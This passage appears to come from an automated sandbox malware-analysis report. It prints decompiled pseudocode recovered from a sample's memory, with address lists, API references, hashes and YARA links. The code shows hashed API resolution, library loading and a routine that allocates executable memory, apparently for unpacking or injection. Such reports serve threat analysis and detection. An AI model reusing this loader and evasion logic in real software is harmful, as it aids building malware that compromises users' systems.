									}
									if(__eax != 0) {
										goto L30;
									} else {
										_v0 = __edx;
										__eax = E003B15C0(0x3ab94787, 0x91935d4e);
										__edx = _v8;
										if(__eax == 0) {
											goto L30;
										} else {
											_push(__ebp);
											_v0 = __edx;
											asm("int3");
											return __eax;
										}
									}
								}
							}
						}
						goto L35;
						L12:
						__eax = E003B15C0(0x3ab94787, 0xf561ae8b);
					} while (__eax == 0);
					__edx = _a44;
					__edx = _a44 >> 1;
					_push(_a44 >> 1);
					_push(_a40);
					_push(__ebx);
					_push(__ebp);
					asm("int3");
					return __eax;
				}
				L35:
			}

0x003cc405
0x003cc405
0x003cc409
0x003cc52e
0x00000000
0x003cc40f
0x003cc40f
0x003cc40f
0x003cc414
0x003cc418
0x003cc41d
0x003cc421
0x003cc425
0x003cc42a
0x003cc42e
0x003cc430
0x003cc435
0x003cc43a
0x003cc43c
0x003cc443
0x003cc445
0x003cc449
0x003cc450
0x003cc51f
0x003cc523
0x003cc528
0x00000000
0x003cc456
0x003cc456
0x003cc45a
0x003cc45e
0x003cc461
0x003cc468
0x003cc46c
0x003cc470
0x003cc470
0x003cc47b
0x003cc47f
0x003cc484
0x003cc496
0x003cc49b
0x003cc49f
0x003cc4c3
0x003cc4a1
0x003cc4a5
0x003cc4a9
0x003cc4ac
0x003cc4b4
0x003cc4bd
0x003cc4bf
0x003cc4bf
0x003cc4c5
0x003cc4cb
0x003cc537
0x003cc537
0x003cc53b
0x003cc337
0x003cc33b
0x003cc36c
0x003cc36c
0x003cc373
0x003cc377
0x003cc37c
0x003cc387
0x003cc33d
0x003cc33d
0x003cc342
0x003cc34d
0x003cc349
0x003cc349
0x003cc349
0x003cc354
0x00000000
0x003cc356
0x003cc360
0x003cc367
0x00000000
0x003cc369
0x003cc369
0x003cc36a
0x003cc36b
0x003cc36b
0x003cc367
0x003cc354
0x003cc4d2
0x003cc4d4
0x003cc510
0x003cc510
0x003cc511
0x003cc517
0x003cc3ba
0x003cc3bf
0x003cc3c7
0x003cc3cb
0x003cc3d0
0x003cc3d2
0x003cc3d4
0x003cc3d9
0x003cc3dd
0x003cc3df
0x00000000
0x003cc51d
0x00000000
0x003cc51d
0x003cc4d6
0x003cc4d8
0x003cc4e3
0x003cc4df
0x003cc4df
0x003cc4df
0x003cc4ea
0x00000000
0x003cc4ec
0x003cc4f6
0x003cc4fa
0x003cc4ff
0x003cc504
0x00000000
0x003cc506
0x003cc506
0x003cc507
0x003cc50b
0x003cc50c
0x003cc50c
0x003cc504
0x003cc4ea
0x003cc4d4
0x003cc4cb
0x00000000
0x003cc3e3
0x003cc3ed
0x003cc3f2
0x003cc3f6
0x003cc3fa
0x003cc3fc
0x003cc3fd
0x003cc401
0x003cc402
0x003cc403
0x003cc404
0x003cc404
0x00000000

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000,3AB94787,0D5493F9,?,00000000), ref: 003CC4BD

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 3dbe6f25ff54ebab37288e8af040a9a84130653229134a99384eae07c0fb49c0
Instruction ID: 1dc7090a156ae0a2098de3dbf501146f0ce5f4c63f3d5eded4cb06039a4e782d
Opcode Fuzzy Hash: 3dbe6f25ff54ebab37288e8af040a9a84130653229134a99384eae07c0fb49c0
Instruction Fuzzy Hash: 8A21D131614301ABC727DF21C890F2FB3E5AFC5354F159A1CF5599B291EA31EC018B92

Uniqueness

Uniqueness Score: -1.00%

Function 003A543B, Relevance: 1.6, APIs: 1, Instructions: 76
libraryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E003A543B(void* __eax, void* __ebx, void* __edi) {
				signed int _t133;
				void* _t136;
				signed int _t144;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t172;
				intOrPtr _t173;
				intOrPtr _t174;
				intOrPtr* _t177;
				void* _t192;
				void* _t202;
				intOrPtr _t205;
				signed int _t215;
				signed int _t219;
				void* _t234;
				intOrPtr* _t235;
				signed int _t238;
				unsigned int _t242;
				intOrPtr _t245;
				signed short* _t246;
				signed int _t249;
				void* _t267;
				signed int _t279;
				signed int _t280;
				signed int _t283;
				signed int _t284;
				intOrPtr* _t328;
				intOrPtr* _t336;
				signed int _t351;
				signed int _t353;
				signed int _t356;
				intOrPtr* _t388;
				signed int _t404;
				void* _t409;
				signed int _t410;
				intOrPtr* _t413;
				void* _t416;
				intOrPtr* _t419;

				_t403 = __edi;
				_t276 = __ebx + 0x3d;
				 *0x3db1d0 = 0;
				_t413 = E003B3930(_t276, 0, __edi, _t407);
				if( *_t413 < 0x10) {
					E003A5150();
				}
				E003A6020(_t276);
				E003B8810(_t419 + 0x114, 0x200);
				_t388 = E003B15C0(0xa1310f65, 0xc4d11e8a);
				if(_t388 != 0) {
					 *_t388(0,  *(_t419 + 0x114),  *(_t419 + 0x114) >> 1);
				}
				E003B2580(_t419 + 0x118, _t403, _t407);
				if(E003B9C70(_t419 + 0x114, _t403,  *((intOrPtr*)(_t419 + 0x118))) == 0) {
					E003B2780(_t419 + 0xe4, _t403, _t407);
					_t133 = E003B9C70(_t419 + 0x114, _t403,  *((intOrPtr*)(_t419 + 0xe4)));
					__eflags = _t133;
					if(_t133 == 0) {
						E003B2580(_t419 + 0xb4, _t403, _t407);
						_t407 = _t419 + 0x98;
						E003BD980(_t419 + 0xbc, _t419 + 0x98, 0x5c);
						_t136 = E003C7600(_t419 + 0x98, 2);
						E003AAC00(_t419 + 0xbc, 6);
						E003B8CC0(_t136,  *((intOrPtr*)(_t419 + 0xbc)));
						E003B8CA0(_t419 + 0xbc);
						E003C89F0(_t407, _t419 + 0x124, 0x5c);
						E003C8910(_t407, _t403, _t407);
						E003B8CA0(_t419 + 0xb4);
						_t144 = E003B9C70(_t419 + 0x114, _t403,  *((intOrPtr*)(_t419 + 0x120)));
						__eflags = _t144;
						_t23 = _t144 > 0;
						__eflags = _t23;
						_t279 = 0 | _t23;
						E003B8CA0(_t419 + 0x120);
					} else {
						_t279 = 1;
					}
					E003B8CA0(_t419 + 0xe4);
					E003B8CA0(_t419 + 0x118);
					__eflags = _t279;
					if(_t279 == 0) {
						_t280 = 0;
						__eflags = 0;
					} else {
						goto L11;
					}
				} else {
					E003B8CA0(_t419 + 0x118);
					L11:
					_t280 = 1;
				}
				E003AAC00(_t419 + 0x120, 2);
				E003BD980(_t419 + 0x128, _t419 + 0x130, 0x7e);
				E003B8CA0(_t419 + 0x120);
				if( *(_t419 + 0x130) > 0) {
					 *_t419 = _t413;
					_t404 = _t419 + 0x130;
					L15:
					while(1) {
						L15:
						while(1) {
							L15:
							if(E003B15C0(0xa1310f65, 0xf3af54a7) != 0) {
								LoadLibraryW( *(E003C7600(_t404, _t407))); // executed
							}
							_t267 =  *(_t419 + 0x130);
							while(1) {
								_t407 = 1;
								if(1 >= _t267) {
									break;
								}
								if(1 != 4) {
									goto L15;
								} else {
									_t391 =  *0x3db02a & 0x000000ff;
									if(( *0x3db02a & 0x000000ff) == 2) {
										continue;
									} else {
										goto L15;
									}
								}
								goto L23;
							}
							_t413 =  *_t419;
							goto L23;
						}
					}
				}
				L23:
				__eflags =  *((intOrPtr*)(_t413 + 0x2c)) - 2;
				if( *((intOrPtr*)(_t413 + 0x2c)) != 2) {
					__eflags =  *0x3db028 & 0x000000ff;
					if(( *0x3db028 & 0x000000ff) == 0) {
						__eflags =  *0x3db265 & 0x000000ff;
						if(( *0x3db265 & 0x000000ff) == 0) {
							__eflags =  *0x3db1cc - 1;
							if( *0x3db1cc != 1) {
								_t245 =  *0x3db1d0; // 0x4c77c8
								_t38 = _t245 + 4; // 0x4c77da
								_t246 =  *_t38;
								_t391 =  *_t246 & 0x0000ffff;
								__eflags = ( *_t246 & 0x0000ffff) - 0x2d;
								if(( *_t246 & 0x0000ffff) != 0x2d) {
									E003B8AB0(_t419 + 0xcc, _t246, 0);
									_push(0x80);
									_push(0);
									E003CA4E0(_t419 + 0x68, __eflags,  *((intOrPtr*)(_t419 + 0xd0)), 1);
									_t249 = E003CBEA0(_t419 + 0x64, _t391, _t407);
									__eflags = _t249;
									if(_t249 == 0) {
										__eflags =  *((char*)(_t419 + 0x68));
										if( *((char*)(_t419 + 0x68)) != 0) {
											E003CBE30(_t419 + 0x64, _t407);
										}
										E003B8CA0(_t419 + 0x58);
										_t410 = 0;
										__eflags = 0;
										while(1) {
											__eflags = E003CA730(_t419 + 0xc4, _t391);
											if(__eflags == 0) {
												break;
											}
											E003B22A0(0x64, _t391);
											_t410 = _t410 + 1;
											__eflags = _t410 - 0x64;
											if(__eflags < 0) {
												continue;
											}
											break;
										}
										_t407 = _t419 + 0xcc;
										do {
											E003BAE80(_t419 + 0xcc, __eflags, _t407, 0x5c);
											E003B8CC0(_t419 + 0xc8,  *(_t419 + 0xcc));
											E003B8CA0(_t407);
											__eflags = E003CA730(_t419 + 0xc4, _t391);
										} while (__eflags == 0);
									} else {
										__eflags =  *((char*)(_t419 + 0x68));
										if( *((char*)(_t419 + 0x68)) != 0) {
											E003CBE30(_t419 + 0x64, _t407);
										}
										E003B8CA0(_t419 + 0x58);
									}
									E003B8CA0(_t419 + 0xc4);
								}
							}
						}
					}
					__eflags = ( *0x3db02a & 0x000000ff) - 2;
					if(( *0x3db02a & 0x000000ff) == 2) {
						L52:
						_t154 =  *0x3db1ad; // 0x2661f98
						__eflags = _t154;
						if(_t154 == 0) {
							L54:
							_t155 =  *0x3db1ad; // 0x2661f98
							__eflags = _t155;
							if(_t155 == 0) {
								_push(0x10);
								_t156 = E003B1030();
								_t419 = _t419 + 4;
								__eflags = _t156;
								if(_t156 != 0) {
									_push(0);
									_t157 = E003C9350(_t156);
								} else {
									_t157 = 0;
								}
								 *0x3db1ad = _t157;
							}
							_t407 =  *0x3db1ad; // 0x2661f98
							__eflags = ( *0x3db02a & 0x000000ff) - 1;
							if(( *0x3db02a & 0x000000ff) == 1) {
								_t391 = 0x18f8c844;
								_t404 = _t419 + 0x28;
								E003A6AD0(_t280, _t404, 0x18f8c844, _t404, _t407, 1, 0); // executed
								_push(_t404);
								E003C9520(_t407);
								E003C9510(_t404);
							} else {
								E003C9710(_t407, 0x3db02d,  *0x3db02b & 0x0000ffff);
							}
						} else {
							_t353 =  *0x3db1ad; // 0x2661f98
							_t219 = E003C9660(_t353);
							__eflags = _t219;
							if(_t219 != 0) {
								goto L54;
							}
						}
						_t162 =  *0x3db1b1; // 0x0
						__eflags = _t162;
						if(_t162 == 0) {
							L60:
							_t163 =  *0x3db1b1; // 0x0
							__eflags = _t163;
							if(_t163 == 0) {
								_push(0x10);
								_t164 = E003B1030();
								_t419 = _t419 + 4;
								__eflags = _t164;
								if(_t164 != 0) {
									_push(0);
									_t165 = E003C9350(_t164);
								} else {
									_t165 = 0;
								}
								 *0x3db1b1 = _t165;
							}
							_t404 =  *0x3db1b1; // 0x0
							__eflags = ( *0x3db02a & 0x000000ff) - 1;
							if(( *0x3db02a & 0x000000ff) == 1) {
								_t391 = 0x11041f01;
								E003A6AD0(_t280, _t419 + 0x38, 0x11041f01, _t404, _t407, 1, 1);
								_push(_t419 + 0x38);
								E003C9520(_t404);
								E003C9510(_t419 + 0x38);
								_t172 = E003C9650(_t404);
								__eflags = _t172;
								if(_t172 != 0) {
									_t391 = 0xd3ef7577;
									E003A6AD0(_t280, _t419 + 8, 0xd3ef7577, _t404, _t407, 0, 0);
									E003C9510(_t419);
								}
							} else {
								_t407 =  *0x3db1c4; // 0x3a0000
								__eflags =  *((char*)(E003B3930(_t280, 0, _t404, _t407) + 0xb)) - 0x20;
								_t400 =  ==  ? 0x7e839a6 : 0x93fc68d6;
								_t391 = _t407;
								E003A9090(_t419 + 0x88, _t407,  ==  ? 0x7e839a6 : 0x93fc68d6);
								_push(_t419 + 0x88);
								E003C9520(_t404);
								E003C9510(_t419 + 0x88);
							}
						} else {
							_t351 =  *0x3db1b1; // 0x0
							_t215 = E003C9660(_t351);
							__eflags = _t215;
							if(_t215 != 0) {
								goto L60;
							}
						}
						_t173 =  *((intOrPtr*)(_t413 + 0x2c));
						__eflags = _t173 - 3;
						if(_t173 == 3) {
							__eflags =  *0x3db1cc - 3;
							if( *0x3db1cc == 3) {
								_t174 =  *0x3db1d0; // 0x4c77c8
								_t122 = _t174 + 8; // 0x4c77e0
								E003B8CC0(_t419 + 0x10c,  *_t122);
							}
							_t281 = _t419 + 0x48;
							E003B8810(_t419 + 0x48, 0);
							_t177 = E003B9890(_t281, _t419 + 0x48, _t391, _t404, _t407, _t281, 0x3d9428,  *((intOrPtr*)(_t413 + 0x2c)));
							E003C0220(_t419 + 0x110,  *_t177, 0);
							E003B8CA0(_t281);
							E003A8180(_t407);
						} else {
							__eflags = _t173 - 5;
							if(_t173 != 5) {
								__eflags = _t173 - 6;
								if(__eflags == 0) {
									_t328 = _t419 + 0xa4;
									 *_t328 = 0;
									 *((intOrPtr*)(_t328 + 4)) = 0;
									 *((intOrPtr*)(_t328 + 8)) = 0;
									 *((intOrPtr*)(_t328 + 0xc)) = 0;
									E003B5B60(_t280, _t328, _t404, _t407, __eflags);
									E003A6740(_t419 + 0xa4);
									E003B1350(0x12);
									__eflags =  *(_t419 + 0xa8);
									if( *(_t419 + 0xa8) > 0) {
										_t283 = 0;
										__eflags = 0;
										do {
											_t192 = E003D2B00(_t419 + 0xa8, _t283);
											__eflags =  *((char*)(_t192 + 0x3c));
											if( *((char*)(_t192 + 0x3c)) == 0) {
												E003A2A40(_t419 + 0x50, _t192);
												E003B8CA0(_t419 + 0x50);
											}
											_t283 = _t283 + 1;
											__eflags = _t283 -  *(_t419 + 0xa8);
										} while (_t283 <  *(_t419 + 0xa8));
									}
									E003D2970(_t280, _t419 + 0xa4, _t404);
									_t332 =  *(_t419 + 0xb0);
									__eflags =  *(_t419 + 0xb0);
									if( *(_t419 + 0xb0) != 0) {
										E003A2A20(_t332, 1);
									}
								}
							} else {
								__eflags = _t280;
								if(_t280 == 0) {
									__eflags =  *0x3db1cc - 1;
									if(__eflags <= 0) {
										L69:
										_t336 = _t419 + 0x18;
										 *_t336 = 0;
										 *((intOrPtr*)(_t336 + 4)) = 0;
										 *((intOrPtr*)(_t336 + 8)) = 0;
										 *((intOrPtr*)(_t336 + 0xc)) = 0;
										E003B5B60(_t280, _t336, _t404, _t407, __eflags);
										__eflags = ( *0x3db029 & 0x000000ff) - 1;
										E003A7DB0(_t419 + 0x18, 0 | ( *0x3db029 & 0x000000ff) - 0x00000001 > 0x00000000);
										__eflags =  *0x3db029 & 0x000000ff;
										if(( *0x3db029 & 0x000000ff) != 0) {
											E003B1350(0x12);
											__eflags =  *(_t419 + 0x1c);
											if( *(_t419 + 0x1c) > 0) {
												_t284 = 0;
												__eflags = 0;
												do {
													_t202 = E003D2B00(_t419 + 0x1c, _t284);
													__eflags =  *((char*)(_t202 + 0x3c));
													if( *((char*)(_t202 + 0x3c)) == 0) {
														E003A2A40(_t419 + 0x10, _t202);
														E003B8CA0(_t419 + 0x10);
													}
													_t284 = _t284 + 1;
													__eflags = _t284 -  *(_t419 + 0x1c);
												} while (_t284 <  *(_t419 + 0x1c));
											}
										}
										E003D2970(_t280, _t419 + 0x18, _t404);
										_t339 =  *(_t419 + 0x24);
										__eflags =  *(_t419 + 0x24);
										if( *(_t419 + 0x24) != 0) {
											E003A2A20(_t339, 1);
										}
									} else {
										_t205 =  *0x3db1d0; // 0x4c77c8
										_t81 = _t205 + 4; // 0x4c77da
										__eflags = ( *( *_t81) & 0x0000ffff) - 0x2d;
										if(__eflags != 0) {
											goto L69;
										}
									}
								}
							}
						}
						E003C8910(_t419 + 0x130, _t404, _t407);
						E003B8CA0(_t419 + 0x110);
						E003B8CA0(_t419 + 0x108);
						E003B7A70(_t419 + 0x128);
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *0x3db027 & 0x000000ff;
						if(( *0x3db027 & 0x000000ff) == 0) {
							goto L52;
						} else {
							__eflags = _t280;
							if(_t280 != 0) {
								goto L52;
							} else {
								__eflags =  *((char*)(_t413 + 0xb)) - 0x20;
								_t402 =  ==  ? 0x7fe7dfa2 : 0xfd81b916;
								E003A61B0(_t419 + 0x3c,  ==  ? 0x7fe7dfa2 : 0xfd81b916,  *((char*)(_t413 + 0xb)) - 0x20);
								E003B8810(_t419 + 0x18, 0x200);
								_t356 = E003B15C0(0xa1310f65, 0xc4d11e8a);
								__eflags = _t356;
								if(__eflags != 0) {
									_t242 =  *(_t419 + 0x18) >> 1;
									__eflags = _t242;
									_t402 =  *0x3db1c4; // 0x3a0000
									 *_t356(_t402,  *(_t419 + 0x18), _t242);
								}
								_push(0x80);
								_push(0);
								E003CA4E0(_t419 + 0x10, __eflags,  *((intOrPtr*)(_t419 + 0x20)), 1);
								E003CA520(_t419 + 8, _t402, _t419 + 0x1c, 0);
								__eflags =  *((char*)(_t419 + 0x10));
								if( *((char*)(_t419 + 0x10)) != 0) {
									E003CBE30(_t419 + 0xc, _t407);
								}
								__eflags = 0;
								E003B8CA0(_t419);
								_t409 = _t419 + 0x1a0;
								_t416 = _t419 + 0x2c;
								while(1) {
									E003B0B70(_t409, 0, 0x44);
									 *((intOrPtr*)(_t419 + 0x1ac)) = 0x44;
									E003B0B70(_t416, 0, 0x10);
									_t419 = _t419 + 0x18;
									E003B8810(_t419 + 0x4c, 0);
									_t234 = E003B96D0(E003B96D0(E003C0220(_t419 + 0x50,  *((intOrPtr*)(_t419 + 0x40)), 0), 0x20), 0x22);
									_t235 =  *0x3db1d0; // 0x4c77c8
									E003B96D0(E003C0220(_t234,  *_t235, 0), 0x22);
									_t238 = E003B15C0(0xa1310f65, 0x643f303c);
									__eflags = _t238;
									if(_t238 != 0) {
										break;
									}
									E003B8CA0(_t419 + 0x48);
								}
								_push(_t416);
								_push(_t409);
								_push(0);
								_push(0);
								_push(4);
								_push(0);
								_push(0);
								_push(0);
								_push( *((intOrPtr*)(_t419 + 0x68)));
								_push( *((intOrPtr*)(_t419 + 0x60)));
								asm("int3");
								return _t238;
							}
						}
					}
				} else {
					E003C8910(_t419 + 0x130, _t403, _t407);
					E003B8CA0(_t419 + 0x110);
					E003B8CA0(_t419 + 0x108);
					E003B7A70(_t419 + 0x128);
					__eflags = 0;
					return 0;
				}
			}

0x003a543b
0x003a543d
0x003a5440
0x003a5451
0x003a5457
0x003a5459
0x003a5459
0x003a545e
0x003a546f
0x003a5483
0x003a5487
0x003a549c
0x003a549c
0x003a54a5
0x003a54bf
0x003a54d9
0x003a54ec
0x003a54f1
0x003a54f3
0x003a5506
0x003a550b
0x003a551c
0x003a5525
0x003a5538
0x003a5546
0x003a5552
0x003a5563
0x003a556a
0x003a5576
0x003a5589
0x003a5590
0x003a5599
0x003a5599
0x003a5599
0x003a559c
0x003a54f5
0x003a54f5
0x003a54f5
0x003a55a8
0x003a55b4
0x003a55b9
0x003a55bb
0x003a55c4
0x003a55c4
0x00000000
0x00000000
0x00000000
0x003a54c1
0x003a54c8
0x003a55bd
0x003a55bd
0x003a55bd
0x003a55d2
0x003a55e8
0x003a55f4
0x003a5601
0x003a5603
0x003a5608
0x00000000
0x003a560f
0x00000000
0x003a560f
0x003a560f
0x003a5622
0x003a562e
0x003a562e
0x003a5630
0x003a5637
0x003a5637
0x003a563a
0x00000000
0x00000000
0x003a563f
0x00000000
0x003a5641
0x003a5641
0x003a564b
0x00000000
0x003a564d
0x00000000
0x003a564d
0x003a564b
0x00000000
0x003a563f
0x003a564f
0x00000000
0x003a564f
0x003a560f
0x003a560f
0x003a5652
0x003a5652
0x003a5656
0x003a569c
0x003a569e
0x003a56ab
0x003a56ad
0x003a56b3
0x003a56ba
0x003a56c0
0x003a56c5
0x003a56c5
0x003a56c8
0x003a56cb
0x003a56ce
0x003a56de
0x003a56e3
0x003a56e8
0x003a56f7
0x003a5700
0x003a5705
0x003a5707
0x003a5724
0x003a5729
0x003a572f
0x003a572f
0x003a5738
0x003a573d
0x003a573d
0x003a573f
0x003a574b
0x003a574d
0x00000000
0x00000000
0x003a5754
0x003a5759
0x003a575a
0x003a575d
0x00000000
0x00000000
0x00000000
0x003a575d
0x003a575f
0x003a5766
0x003a5770
0x003a5783
0x003a578a
0x003a579b
0x003a579b
0x003a5709
0x003a5709
0x003a570e
0x003a5714
0x003a5714
0x003a571d
0x003a571d
0x003a57a6
0x003a57a6
0x003a56ce
0x003a56ba
0x003a56ad
0x003a57b2
0x003a57b5
0x003a5b3c
0x003a5b3c
0x003a5b41
0x003a5b43
0x003a5b54
0x003a5b54
0x003a5b59
0x003a5b5b
0x003a5e33
0x003a5e35
0x003a5e3a
0x003a5e3d
0x003a5e3f
0x003a5e47
0x003a5e49
0x003a5e41
0x003a5e41
0x003a5e41
0x003a5e4e
0x003a5e4e
0x003a5b61
0x003a5b6e
0x003a5b71
0x003a5e0b
0x003a5e10
0x003a5e1a
0x003a5e21
0x003a5e22
0x003a5e29
0x003a5b77
0x003a5b86
0x003a5b86
0x003a5b45
0x003a5b45
0x003a5b4b
0x003a5b50
0x003a5b52
0x00000000
0x00000000
0x003a5b52
0x003a5b92
0x003a5b97
0x003a5b99
0x003a5baa
0x003a5baa
0x003a5baf
0x003a5bb1
0x003a5eb0
0x003a5eb2
0x003a5eb7
0x003a5eba
0x003a5ebc
0x003a5ec4
0x003a5ec6
0x003a5ebe
0x003a5ebe
0x003a5ebe
0x003a5ecb
0x003a5ecb
0x003a5bb7
0x003a5bc4
0x003a5bc7
0x003a5e62
0x003a5e68
0x003a5e73
0x003a5e74
0x003a5e7d
0x003a5e84
0x003a5e89
0x003a5e8b
0x003a5e93
0x003a5e9e
0x003a5ea6
0x003a5ea6
0x003a5bcd
0x003a5bcf
0x003a5be8
0x003a5bf1
0x003a5bf5
0x003a5bf7
0x003a5c05
0x003a5c06
0x003a5c12
0x003a5c12
0x003a5b9b
0x003a5b9b
0x003a5ba1
0x003a5ba6
0x003a5ba8
0x00000000
0x00000000
0x003a5ba8
0x003a5c1e
0x003a5c21
0x003a5c24
0x003a5d87
0x003a5d8e
0x003a5ed5
0x003a5eda
0x003a5ee4
0x003a5ee4
0x003a5d94
0x003a5d9c
0x003a5daa
0x003a5dbd
0x003a5dc4
0x003a5dc9
0x003a5c2a
0x003a5c2a
0x003a5c2d
0x003a5cf0
0x003a5cf3
0x003a5cfb
0x003a5d02
0x003a5d04
0x003a5d07
0x003a5d0a
0x003a5d0d
0x003a5d1b
0x003a5d25
0x003a5d2a
0x003a5d32
0x003a5d34
0x003a5d34
0x003a5d36
0x003a5d3e
0x003a5d43
0x003a5d47
0x003a5d4f
0x003a5d58
0x003a5d58
0x003a5d5d
0x003a5d5e
0x003a5d5e
0x003a5d36
0x003a5d6e
0x003a5d73
0x003a5d7a
0x003a5d7c
0x003a5d80
0x003a5d80
0x003a5d7c
0x003a5c33
0x003a5c33
0x003a5c35
0x003a5c3b
0x003a5c42
0x003a5c58
0x003a5c5a
0x003a5c5e
0x003a5c60
0x003a5c63
0x003a5c66
0x003a5c69
0x003a5c77
0x003a5c81
0x003a5c8d
0x003a5c8f
0x003a5c96
0x003a5c9b
0x003a5ca0
0x003a5ca2
0x003a5ca2
0x003a5ca4
0x003a5ca9
0x003a5cae
0x003a5cb2
0x003a5cba
0x003a5cc3
0x003a5cc3
0x003a5cc8
0x003a5cc9
0x003a5cc9
0x003a5ca4
0x003a5ca0
0x003a5cd3
0x003a5cd8
0x003a5cdc
0x003a5cde
0x003a5ce6
0x003a5ce6
0x003a5c44
0x003a5c44
0x003a5c49
0x003a5c4f
0x003a5c52
0x00000000
0x00000000
0x003a5c52
0x003a5c42
0x003a5c35
0x003a5c2d
0x003a5dd5
0x003a5de1
0x003a5ded
0x003a5df9
0x003a5dfe
0x003a5e0a
0x003a57bb
0x003a57c2
0x003a57c4
0x00000000
0x003a57ca
0x003a57ca
0x003a57cc
0x00000000
0x003a57d2
0x003a57dc
0x003a57e4
0x003a57e7
0x003a57f5
0x003a5809
0x003a580b
0x003a580d
0x003a5813
0x003a5813
0x003a581a
0x003a5821
0x003a5821
0x003a5823
0x003a5828
0x003a5834
0x003a5844
0x003a5849
0x003a584e
0x003a5854
0x003a5854
0x003a5859
0x003a585e
0x003a5863
0x003a586a
0x003a586e
0x003a5873
0x003a5878
0x003a5888
0x003a588d
0x003a5896
0x003a58b7
0x003a58be
0x003a58d0
0x003a58df
0x003a58e4
0x003a58e6
0x00000000
0x00000000
0x003a5996
0x003a5996
0x003a58ec
0x003a58ed
0x003a58ee
0x003a58ef
0x003a58f0
0x003a58f2
0x003a58f3
0x003a58f4
0x003a58f5
0x003a58f9
0x003a58fd
0x003a58fe
0x003a58fe
0x003a57cc
0x003a57c4
0x003a5658
0x003a565f
0x003a566b
0x003a5677
0x003a5683
0x003a5688
0x003a5694
0x003a5694

APIs

LoadLibraryW.KERNEL32(00000000,00000001,A1310F65,F3AF54A7,A1310F65,F3AF54A7), ref: 003A562E

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e9210600c22db2dba4c0e8431926fe5fd284e7ecf05f74fde16d63f1f076f31d
Instruction ID: ba0b6e2d8319ac20d18251b24e7ebf870464853dbf8b5d6fc55a08aa601b820c
Opcode Fuzzy Hash: e9210600c22db2dba4c0e8431926fe5fd284e7ecf05f74fde16d63f1f076f31d
Instruction Fuzzy Hash: 6C21D63110C6849BC737BB64C863BEEB3E5EF96304F41482DE6868A592EF309945CB52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10002140, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E10002140() {
				intOrPtr _t1;

				_t1 =  *0x10009d30; // 0x3c400
				 *0x10009d9c = _t1;
				 *0x10009da0 = GetProcAddress(LoadLibraryA("kernel32"), "VirtualAlloc");
				_push(0x40);
				_push(0x3000);
				_push( *0x10009d9c);
				_push( *0x10009d7c);
				_push( *0x10009da0);
				_push(E100021B7);
				_push( *0x10009da0);
				return 0x40;
			}

0x10002143
0x10002148
0x10002164
0x1000216e
0x10002174
0x10002175
0x1000217b
0x10002181
0x100021b0
0x100021b5
0x100021b6

APIs

LoadLibraryA.KERNEL32(kernel32), ref: 10002157
GetProcAddress.KERNEL32(00000000,?,1000271F,00001EB1), ref: 1000215E

Strings

VirtualAlloc, xrefs: 1000214D
kernel32, xrefs: 10002152

Memory Dump Source

Source File: 00000004.00000002.2401225679.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2401219308.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2401231871.0000000010004000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2401235616.0000000010007000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2401240914.0000000010008000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2401246497.000000001000A000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: VirtualAlloc$kernel32
API String ID: 2574300362-401495515
Opcode ID: cbfbe2b16eeeaf55bed70a1d2f924d838dbfb4fca7c25281cf176b66195a9917
Instruction ID: 9fdde6ceb45ff9c80efd86e2d249e6e20355c807403ab681b38dcf293fca579e
Opcode Fuzzy Hash: cbfbe2b16eeeaf55bed70a1d2f924d838dbfb4fca7c25281cf176b66195a9917
Instruction Fuzzy Hash: A4E01AB11A4220AFFB859BA8CC84E613BB9F34C2C1B50402BF689D226CD731A910CB15

Uniqueness

Uniqueness Score: -1.00%

Function 003C7660, Relevance: 4.5, Strings: 3, Instructions: 793
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E003C7660(intOrPtr* __ecx, signed int* _a4, signed int _a8) {
				signed int _v32;
				intOrPtr* _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _t203;
				signed int _t206;
				signed int* _t207;
				signed int* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t239;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int* _t248;
				signed int _t250;
				signed int _t251;
				signed int _t259;
				signed int _t262;
				void* _t264;
				signed int _t265;
				signed int _t266;
				signed int* _t269;
				signed int _t271;
				signed int _t272;
				signed int _t275;
				signed int _t280;
				signed int* _t281;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t294;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t309;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int* _t316;
				signed int _t324;
				signed int _t326;
				unsigned int _t331;
				signed int _t333;
				signed int* _t335;
				signed int _t337;
				signed int* _t339;
				char _t340;
				char _t341;
				signed int _t343;
				intOrPtr* _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t349;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				unsigned int _t372;
